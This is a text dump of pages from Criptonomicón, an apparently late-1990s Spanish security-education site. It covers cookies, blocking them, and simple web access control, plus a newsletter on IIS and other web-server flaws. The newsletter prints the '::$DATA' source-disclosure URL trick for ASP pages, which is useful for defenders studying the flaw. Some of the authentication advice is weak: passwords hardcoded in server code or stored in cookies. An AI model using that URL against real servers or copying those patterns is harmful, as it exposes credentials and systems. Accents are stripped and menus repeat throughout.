Usos
Ejemplos
Descripcin
A dieta
Recursos
Descripcin
La caja de las cookies
Ingredientes
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Principal
Qu son
Riesgos
Ejemplos
Usos de las cookies
A dieta
Recursos
Bien vistos
Mal vistos
Alternativas
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Cookies - Ejemplos
Principal
Qu son
Riesgos
Usos
A dieta
Recursos
Ejemplos en JavaScript
Contador personal
Bienvenida personalizada
ltima vez que se visit la pgina
Los tres anteriores juntos
Personalizacin de colores
Ejemplos en CGI
Carrito de la Compra en un Centro Comercial
Analizador de la actividad del usuario
Cmo refrescar banners
Ejemplo en ASP
Datos del cliente
Un paseo por tus cookies
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Principal
Qu son
Riesgos
Usos
Ejemplos
Configuracin de
navegadores
Recursos
Protegerse en Unix
Protegerse en
Windows
Monstruos de las
galletas
Netscape
En el men Opciones, en Preferencias de Red, en la pestaa de Protocolos,
marca la casilla Mostrar una advertencia antes de aceptar una cookie. Esto en
realidad no desactiva la cookie, sino que obliga al navegador a mandarte un aviso
cada vez que le envan una cookie. Con decir que no la quieres se acab el problema.
Sin embargo, ms que una solucin, esta componenda puede llegar a ser una tortura
si nos conectamos a un sitio que nos mande una cookie con cada imagen,
inundndonos con ellas. Si usas el Communicator, entonces vete al men de
Edicin, Preferencias y selecciona en el rbol la ramita de Avanzadas, ah
encontrars una serie de opciones sobre las cookies. Si de verdad ests lleno y no
quieres tragar ni una ms, selecciona la opcin de desactivar cookies siempre y a
correr.
Navegacin annima
Otra forma de evitar las cookies es navegar a travs de un anonimizador.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Principal
Qu son
Riesgos
Usos
Ejemplos
Andy's Netscape HTTP Cookie Info
A dieta
Cookie Central
Malcolm's Guide to Persistent Cookies
How Web Servers' Cookies Threaten Your Privacy
Client Side State - HTTP Cookies
Cookie I-D Drafts
Cookies
Do you want a cookie
Galletas De qu sabor las quieres
HotWired Search Results
How to make Netscape Cookies and shopping cart
Cookies with JavaScript
JavaScript Tip of the Week for November 25, 1
La Rebotica
Matt's Script Archive HTTP Cookie Library
The Cookie Trade 1
Web programming - adding cookies to your site
WebCoder.com - Your home for JavaScript and D.
Yahoo! - Computers and InternetInternetWorld
Cookies
Christmas Cookies Anyone?
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Principal
Qu son
Riesgos
Usos
Ejemplos
Configuracin de
navegadores
Recursos
Protegerse en Unix
Protegerse en
Windows
Monstruos de las
galletas
Lo primero de todo es borrar todos los contenidos del fichero cookies, a pesar de
lo que diga en la cabecera. Para localizarlo, consulta la pgina la caja de las cookies.
Una vez vaciado su contenido, cambia su permiso escribiendo
chmod -w cookies
en la lnea de comandos. De esta forma el fichero es de slo lectura, por lo que no se
pueden modificar sus contenidos. No hay que olvidar que a pesar de bloquear el
fichero de las cookies, stas siguen estando activas en memoria en tanto dure la
sesin abierta con el navegador.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Principal
Qu son
Riesgos
Usos
Ejemplos
Configuracin de
navegadores
Recursos
Protegerse en Unix
Protegerse en
Windows
Monstruos de las
galletas
Netscape
Es decir, para el caso de Netscape se localiza el archivo de cookies, se borra todo su
contenido y se cambian sus propiedades a slo lectura, oculto y sistema. De esta
forma se evita que el navegador acceda al disco, aunque seguir dejando las cookies
en memoria, que durarn hasta que cerremos el navegador.
Internet Explorer
En el caso de Internet Explorer, dado que las cookies no se almacenan en un fichero
nico, sino en distintos ficheros en el directorio cookies, la idea consistira en
bloquear el acceso a dicho directorio. Para ello, se borran todos los ficheros con
cookies del mismo y se cambian las propiedades del directorio a slo lectura y
oculto. Sin embargo, esto no funciona, ya que el Explorer escribe a pesar de todo en
el directorio. Se podra pensar en otra estrategia, como bloquear cada fichero de
cookies que ya hemos recibido. Desgraciadamente, esta treta tampoco funciona, ya
que, ni corto ni perezoso, crea otro fichero con el mismo nombre, al que le aade un
nmero de orden: (1), (2), etc. Tambin he probado a modificar el registro, la opcin
del directorio por defecto para escribir las cookies, ponindolo a nul, pero ni con
esas. Sigue escribiendo en el directorio. As que aparte de un fichero bat que borre
los contenidos del directorio de cookies cada vez que arrancamos el navegador (ya
que mientras nevegamos las cookies se escriben en memoria, y no se vuelcan a disco
hasta que cerramos la sesin), no he encontrado solucin posible.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
Principal
Qu son
Riesgos
Usos
Ejemplos
Configuracin de
navegadores
Recursos
Protegerse en Unix
Protegerse en
Windows
Tambin abundan los monstruos de las galletas que no dejan ni las Monstruos de las
galletas
migas. Se trata de programas que funcionan conjuntamente con el
navegador, bloqueando todas o parte de las cookies que le llegan o borrando
peridicamente el archivo de cookies de tu disco duro. Estos programas pueden
resultar de utilidad incluso aunque se disponga de versiones 4 superior de los
navegadores, ya que hay situaciones en las que no conviene tener activada la opcin
de rechazar las cookies siempre, como en el caso de las visitas a tiendas en lnea,
como Amazon.com.
Si te interesa probar con alguno, puedes encontrarlos en las siguientes direcciones:
Cookie Pal
Cookie Monster.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Principal
Riesgos
Usos
Ejemplos
A dieta
Recursos
Dnde se esconden
Descripcin
La caja de las cookies
Ingredientes
Recetas en JavaScript
Recetas en CGI
Recetas en ASP
Horno Express
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Principal
Riesgos
Usos
Ejemplos
A dieta
Recursos
Descripcin
La caja de las cookies
Ingredientes
Recetas en JavaScript
Recetas en CGI
Recetas en ASP
Horno Express
Ms ingredientes
No obstante, si editamos el fichero de cookies, veremos que aparecen muchos ms
datos, algunos bastante crpticos. Bien, vamos a analizarlos uno por uno.
Un dominio
Se trata de un nombre de dominio parcial o completo para el cual ser vlida la
cookie. El navegador devolver la cookie a todo host que encaje con el nombre
de dominio parcial. Por ejemplo, si especificas un nombre de dominio de la
forma .ehu.es, entonces el navegador devolver la cookie a servidores Web
alojados en cualquiera de las mquinas www.bi.ehu.es, bidx01.bi.ehu.es,
www.lg.ehu.es, etc. Los nombres de dominio deben incluir al menos dos
puntos para evitar intentos fraudulentos de encajar dominios de alto nivel
como .es. Si no se especifica ningn dominio, entonces el navegador slo
devolver la cookie a la mquina que la origin. Adems, este atributo viene
acompaado de un flag que indica si todas las mquinas dentro del dominio
especificado pueden acceder a la variable.
Un camino
Cuando se suministra el atributo de camino para la cookie, el navegador lo
contrastar con el URL de tu script antes de devolver la cookie. Por ejemplo, si
especificas el camino /cgi-bin, entonces la cookie ser devuelta a scripts de
la forma /cgi-bin/pedido.pl, /cgi-bin/datos.pl y
/cgi-bin/ficha_cliente/credito.pl, pero no al script
file:///C|/TEMP/criptonomicon/criptonomicon/cookies/ingre.html (1 of 2) [25/10/2000 02:32:05 p.m.]
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Principal
Riesgos
Usos
Ejemplos
Recetas en JavaScript
A dieta
Recursos
Descripcin
La caja de las cookies
Ingredientes
Recetas en JavaScript
Recetas en CGI
Recetas en ASP
Horno Express
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Principal
Riesgos
Usos
Ejemplos
Recetas en CGI
A dieta
Recursos
Descripcin
La caja de las cookies
Ingredientes
Recetas en JavaScript
Recetas en CGI
Recetas en ASP
Horno Express
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Principal
Riesgos
Usos
Ejemplos
A dieta
Recursos
Recetas en ASP
Descripcin
La caja de las cookies
Ingredientes
Las Pginas Activas de Servidor (Active Server Pages) o ASP
Recetas en JavaScript
para abreviar, representan el paradigma de la filosofa de
Recetas en CGI
Microsoft en su estrategia para Internet. A diferencia de otros
productos de Microsoft, como los controles ActiveX o los guiones Recetas en ASP
Horno Express
en VisualBasic (VBScript), las aplicaciones ASP se procesan y
ejecutan en el servidor y no en el cliente, siendo en este sentido
parecidas a las aplicaciones CGI, pero integrando otros servicios y aplicaciones
Microsoft, todo ello utilizando el lenguaje Visual Basic como aglutinante.
("nombre_cookie").Expires = fecha
("nombre_cookie").Domain = "dominio"
("nombre_cookie").Path = "camino"
("nombre_cookie").Secure = valor
Por ejemplo, para enviar la cookie, con el nombre y apellido del cliente y que
caduque en un ao, para nuestro dominio y a partir del directorio raz, haremos:
Response.Cookies
Response.Cookies
Response.Cookies
Response.Cookies
Response.Cookies
Response.Cookies
("cliente")("nombre") = "Gonzalo"
("cliente")("apellido") = "Alvarez"
("cliente").Expires = Date + 365
("cliente").Path = "/"
("cliente").Domain = ".iec.csic.es"
("cliente").Secure = 1
Podis ver cmo funciona todo en varios ejemplos: en uno de ellos se os enva una
cookie y en el otro se leen todas las cookies que haya enviado este servidor.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Principal
Riesgos
Usos
Ejemplos
Descripcin
Horno Express
A dieta
Ingredientes
Instrucciones de uso:
Recursos
Recetas en JavaScript
Recetas en CGI
Recetas en ASP
Horno Express
variable
en
en
Diciembre
a las
11
31
59
en el ao
59
parmetros opcionales:
camino:
dominio:
seguro:
pm
1999
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Principal
Qu son
Riesgos
Usos
A dieta
Ejemplos
Recursos
Password:
(Un sitio normal incluira aqu preguntas sobre tu nombre, profesin, direccin,
ingresos, etc.)
Enviar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Localizacin
JavaScript
Java
ASP
CGI
Java
JavaScript
Nombres
Correo seguro
Web seguro
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Susurros desde la Cripta
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Nombres
Localizacin
JavaScript
Java
ASP
Agujeros
Spam
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Remailers
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
El conocimiento es la puerta
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Susurros desde la Cripta
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Nombres
Localizacin
JavaScript
Java
ASP
CGI
Limitaciones
Spam
Remailers
Anonimato
Correo seguro
Tambin es posible proteger todos los archivos de un directorio con una nica clave,
que consistir en el nombre del directorio. Ahora, el nombre del fichero es conocido,
pero no su localizacin. De esta forma, si queremos cambiar la clave de acceso a
varios ficheros no ser necesario cambiarles el nombre a todos (no hay que olvidar
que la clave de acceso es el propio nombre del fichero), sino que bastar con
moverlos a todos a otro directorio distinto, cuyo nombre pasar a ser la nueva clave.
Comprubalo en el ejemplo.
Web seguro
material para el cerebro como para pasar varios meses enfrascado en ellas.
Referencias
Libro de Visitas
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Nombres
Localizacin
JavaScript
Java
ASP
Remailers
Anonimato
Correo seguro
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Web seguro
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Nombres
Localizacin
JavaScript
Java
ASP
CGI
Como en los casos previamente analizados, se trata de leer una
clave introducida por del usuario y garantizar el acceso slo si la
Limitaciones
clave es correcta. En este caso, dado que el cdigo fuente no se
encuentra disponible para los usuarios, bien porque el programa se compila, o bien
porque, aun siendo interpretado, el servidor no permite su listado, resulta posible
embeber la clave dentro del cdigo fuente, como se hace en el ejemplo. Una vez
verificada la clave, simplemente se transporta al usuario a la pgina de error si
aqulla es incorrecta, o a la pgina protegida, si fuera correcta, como en este ejemplo.
En este tipo de pginas, en las que se pide la clave a travs de un formulario, pueden
existir problemas debido a la funcionalidad de Autocompletar de Internet Explorer.
Ahora bien, puede resultar tedioso tener que introducir el nombre y la clave cada vez
que queremos acceder a pginas protegidas en el Web. Para evitar esta repeticin,
una posible solucin consiste en pedir el nombre y la clave una sola vez y
almacenarlos en una cookie, de manera que a partir de ese momento cada vez que se
acceda a un servicio protegido, se compruebe la informacin de autenticacin
leyendo la cookie. Puedes comprobarlo en este ejemplo. No hay que olvidar los
problemas que plantea este enfoque con cookies.
Correo seguro
Web seguro
Por otro lado, dado que con CGI se pueden generar pginas al vuelo, se nos
presentan interesantes posibilidades para soslayar el problema del bookmarking. Por
ejemplo, imaginemos que deseamos ofrecer una coleccin de fotos a aquellos que
hayan pagado por verlas. Si las fotos no se acceden directamente a travs de un URL,
sino por medio de un CGI, evitamos as que nadie pueda enlazarlas directamente. Si
Referencias
Libro de Visitas
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Listado de directorios
Nombres
Linux
Navegacin segura
Control de acceso
CGI
Localizacin
JavaScript
Java
ASP
Cookies
Solucin
En la configuracin del servidor est disponible la posibilidad de
CGI
deshabilitar el listado de directorios, as como la presentacin por
defecto de un fichero cuando se solicite el nombre del directorio.
Limitaciones
Este fichero suele llamarse index.html o default.htm y si
no est presente, aparecer una pgina de error en vez de listarse el contenido del
fichero.
Crashes
Bookmarking
Java
JavaScript
Agujeros
Spam
Remailers
Anonimato
Una vez que un usuario ha accedido a la pgina protegida, es decir, una vez que
conoce su URL, nada impide que lo guarde en su lista de marcadores y acceda a l
en el futuro sin pasar antes por el proceso de autenticacin. Es ms, podra desde
una pgina Web poner un enlace a la pgina o fichero protegido en cuestin, de
manera que cualquier usuario podra acceder a l sin autenticarse antes.
Solucin
Cambiar frecuentemente la clave/nombre del fichero a proteger, de manera que no se
pueda acceder directamente a la pgina sin pasar antes por el proceso de
autenticacin (al menos no por mucho tiempo).
Correo seguro
Web seguro
Referencias
Libro de Visitas
Cookies
El problema ms importante que plantean las cookies es que la informacin de
nombre y clave quedan guardados en el disco duro, de manera que cualquier
persona que disponga de acceso fsico al mismo ser capaz de leerla y por
consiguiente entrar a ese servicio.
Por otro lado, no todos los navegadores soportan cookies, o bien su aceptacin est
desactivada en muchos de ellos.
Solucin
Respecto al acceso fsico a la cookie, la nica solucin consiste en que el usuario
proteja convenientemente sus archivos sensibles cuando no los est utilizando.
En cuanto a los usuarios que desactivan la navegacin con cookies, se les debe avisar
del propsito de estas cookies para que no desconfen de ellas y las habiliten mientras
navegan por nuestras pginas. Los monstruos de galletas son otra solucin aceptable.
En cualquier caso, el uso de cookies es ms una conveniencia que una necesidad, por
lo que si un usuario no puede o no quiere aceptar cookies, los mtodos que las
Autocompletar contraseas
Internet Explorer 5.0 incorpora la posibilidad de recordar los campos que se
rellenan en un formulario, incluidas las contraseas. Esta caracterstica, que puede
resultar muy cmoda para una persona que es la nica usuaria de un ordenador,
abre un importante problema de seguridad cuando son varios los usuarios que
navegan desde la misma cuenta en el ordenador.
Cuando un usuario visita una pgina en la que se le pide login y password, tras
haberlos introducido, le aparecer una ventana en la que se le pregunta si desea que
Windows recuerde la contrasea para no tener que escribirla la prxima vez que
visite esa pgina. En caso afirmativo, quedar almacenada de forma codificada en el
registro de configuraciones de Windows, de manera, que en el futuro, cada vez que
se acceda a la misma pgina, se rellener la contrasea automticamente. Para
usuarios que se conectan a multitud de servicios de Internet, esta funcionalidad
adicional puede simplificarles terriblemente la vida, en la medida en que no
necesitan recordar docenas de contraseas distintas. Sin embargo, si otro usuario
navegando desde su misma cuenta accediera a esa pgina, automticamente
recibira permiso para acceder a ella.
Solucin
Qu puede hacer el usuario
En primer lugar, en la ventana que se le presenta debe contestar que no lo desea y
activar la casilla "No volver a ofrecer recordar contraseas".
Si esta funcionalidad ya est activada, puede borrar todas las contraseas y desactivar
la caracterstica en Herramientas --> Opciones de Internet... --> Contenido -->
Autocompletar... .
Qu puede hacer el administrador
Como un creador de pginas web no puede prever lo que harn los potenciales
visitantes, ms vale asegurarse de que no ocurrirn sorpresas. Puede desactivar la
posibilidad de Autocompletar aadiendo el atributo AUTOCOMPLETE="OFF" a la
etiqueta <FORM>:
<FORM METHOD="POST" ACTION="ENVIAR.ASP"
AUTOCOMPLETE="OFF">
En el caso de que slo se quiera desactivar el autocompletado en algunos campos
ms comprometidos del formulario y no en todos, puede utilizarse ese mismo
atributo en las etiquetas de los campos, por ejemplo:
Advertencia final!
Ninguno de estos mtodos debe ser considerado como una solucin a prueba de
intrusos. En ningn caso es posible aproximarse a los niveles de seguridad
proporcionados por el servidor, usando autenticacin bsica, desafo y respuesta,
certificados, u otras tcnicas. Estos mtodos estn diseados para proteger recursos
que no requieran alta seguridad. No se recomienda su uso para la proteccin de
informacin altamente secreta.
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin11.txt
******************************************
1. Hackers de todo el mundo entran el servidor web de Microsoft
EXCLUSIVA! Un grupo de hackers descubri el pasado jueves una grave fisura de
seguridad en el servidor web de Microsoft y obtuvo los cdigos fuente (o claves
informticas) de las pginas activas en el servidor, realizadas en asp y perl,
pudiendo obtener, de este
modo, informacin confidencial y contraseas de acceso a bases de datos de Microsoft.
Analizando estos cdigos fuente, los intrusos
informticos pueden entrar en los servidores web NT que no hayan adoptado en los ltimos
das extremas medidas de seguridad. Alrededor del 40 % de servidores web en Internet
utiliza esta plataforma.
Microsoft ha enviado un boletn especial a un buen nmero de
administradores de sistemas, reconociendo el hecho e instndoles a adoptar
extraordinarias medidas de seguridad. La fisura descubierta por los hackers se comprobaba
colocando los signos ::$DATA despus de marcar una direccin de cualquier pgina en
asp. En ese momento se abra una ventana que permita acceder a los cdigos fuente de
las pginas del servidor, segn pudo comprobar directamente La Brjula.
El descubrimiento se difundi por todo el mundo a las 18.24 hora
espaola, 6.24 AM Pacific, y doce horas despus, a las 6.15 hora
espaola, Microsoft difundi una comunicacin especial advirtiendo del hecho. En esas
doce horas de diferencia, cientos de programadores de todo el mundo descargaron ficheros
de Microsoft, as como de otros servidores con idnticos problemas de seguridad. La
compaa de Bill Gates tambin ha habilitado un sitio web:
http://www.microsoft.com/security
facilitando la informacin. La
noticia de este bug, que ha sido recogida tambin por News.com y Wired, ocupa en estos
das la atencin de miles de programadores
mundiales. Consitituye, asimismo, uno de los fallos de seguridad ms graves de Microsoft
en los ltimos meses.
(Tomado de LABRUJULA.NET Domingo, 5 julio 1998 y reproducido con el permiso de Mikel
Amigot. Ms informacin en http://www.imssa.es/)
******************************************
2. Agujero de seguridad en ASP
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin11.txt
http://www.tuservidor.es/tupagina.asp::$DATA
y obtendris el fichero fuente, no la pgina producida por su ejecucin.
Son vulnerables a este ataque los ficheros con las extensiones .inc, .idc, .stm, .asp,
.asa, .shtm, .shtml y .pl en servidores NT con IIS.
Si se tiene en cuenta que estas pginas se suelen utilizar para autenticacin y control
de acceso, as como para gestin y consultas de bases de datos y que muchas veces en
ellas se encuentran codificados los ficheros de claves o incluso las mismas claves, la
obtencin del cdigo fuente nos puede permitir hacernos con dichas claves y acceder a los
servicios que protegen.
Por este motivo, resulta de extrema importancia que los administradores que utilicen
pginas activas ASP para proteger sus recursos parcheen el fallo.
Para una descripcin detallada del agujero podis acudir a:
http://www.activeserverpages.com/security/
http://www.zdnet.com/wsources/content/0798/ntnd_asp_hole.html
Podis encontrar distintos parches en las siguientes direcciones:
http://www.softwing.com/iisdev/ddatafix/
http://www.microsoft.com/security/bulletins/ms98-003.htm
******************************************
3. Fracaso de los planes criptogrficos de la Casa Blanca
Una comisin del gobierno no ha conseguido, en dos aos de trabajo,
disear un sistema federal de seguridad informtica que incluyera
"puertas traseras", una caracterstica que posibilitara la vigilancia
de los servicios de inteligencia, segn han reconocido a Reuters
fuentes cercanas a la citada comisin.
Este fracaso proyecta nuevas dudas sobre la poltica de la Casa Blanca
partidaria de incluir dichas "puertas traseras" en las tecnologas de
cifrado utilizadas para proteger las comunicaciones.
Sin embargo, representantes de la administracin intentaron quitar
hierro al asunto y se limitaron a decir que la comisin necesita ms
tiempo, pues su plan de accin termina este mes de julio.
"No dira que el tema est terminado de ninguna forma", ha dicho el
Subsecretario de Comercio William Reinsch. "Evidentemente, es una
tarea difcil".
La comisin, compuesta por 22 expertos, fue constituida en 1996 y la
semana pasada realiz una reunin en la que se constat que no ha
podido superar los obstculos tcnicos existentes para crear la
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin11.txt
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin11.txt
Las extensiones de FrontPage mal configuradas podran llegar a exponer tus datos o
incluso todo tu servidor Web a riesgos innecesarios. Puedes aprender acerca de cules son
los problemas de seguridad ms comunes de FrontPage y cmo identificarlos y corregirlos
en:
http://www.developer.com/journal/techworkshop/070298_frontpage.html
******************************************
6. Bug en servidores Web que permite ver cdigo fuente
Un grupo de programadores de San Diego Source, del servicio de noticias en lnea del San
Diego Daily Transcript, ha descubierto un agujero de seguridad que afecta al software de
servidor de Netscape Communications y de la compaa de software y editora de libros
O'Reilly & Associates.
El fallo, que permite presentar cdigo confidencial de programas en versiones de Netscape
Enterprise y de WebSite Professional de O'Reilly & Associates para Windows NT y Windows
95, puede ser explotado por los hackers para obtener informacin que los programadores
consideran de otra forma inaccesible, como passwords de bases de datos, nombres de
usuario e incluso cdigo de programa que provoca la activacin de ciertos eventos pero no
que est pensado para que lo vea el pblico.
Ms informacin en:
http://www.sddt.com/files/library/98/06/25/tbc.html
******************************************
7. Compaq lanza el mdulo Fingerprint ID para PCs
Compaq Computer ha lanzado un pequeo mdulo hardware para utilizar en PCs de sobremesa
que permitira a los usuarios entrar en mquinas Windows usando una exploracin de la
huella digital. Como en las pelculas de James Bond.
Ms datos en:
http://www.pcworld.com/cgi-bin/pcwtoday?ID=7309
******************************************
8. Informacin sobre suscripcin y cmo borrarse
Para borrarse de este servicio basta con enviar un correo a la direccin
cripto-request@iec.csic.es con el siguiente mensaje (sin asunto o "subject"):
leave
desde la misma cuenta de correo en la que recibs el boletn.
Tenis ms informacin en la pgina
http://www.iec.csic.es/criptonomicon/suscripcion.html
******************************************
(C) Copyright 1998 Criptonomicn
http://www.iec.csic.es/criptonomicon
Un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC por
Gonzalo lvarez Maran
email: gonzalo@iec.csic.es
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
Nombres
Localizacin
JavaScript
Java
CGI
ASP
Java
CGI
JavaScript
Cookies
Limitaciones
Crashes
Clave:
Agujeros
Confirmar
Spam
Anonimato
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Correo seguro
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Web seguro
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Nombres
Localizacin
JavaScript
Java
ASP
CGI
Limitaciones
Nombre:
Crashes
Clave:
Agujeros
Confirmar
Spam
Anonimato
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Correo seguro
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Web seguro
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Coleccin de imgenes
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Localizacin
JavaScript
Java
Java
JavaScript
Nombres
ASP
CGI
Limitaciones
The Tempest
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Es importante notar que los ficheros con las imgenes pueden encontrarse en
cualquier posicin del rbol de directorios del servidor, no necesariamente en el rea
documentos del servidor Web. Se puede definir la posicin dentro de la estructura de
directorios donde se encuentran almacenadas las imgenes de forma tal que no sean
accesibles a travs de la Web. De esta forma, se consigue aislar completamente el
lugar fsico donde se guardan las imgenes del servidor Web. En estas circunstancias,
resulta completamente imposible enlazar directamente a las imgenes, sin pasar antes
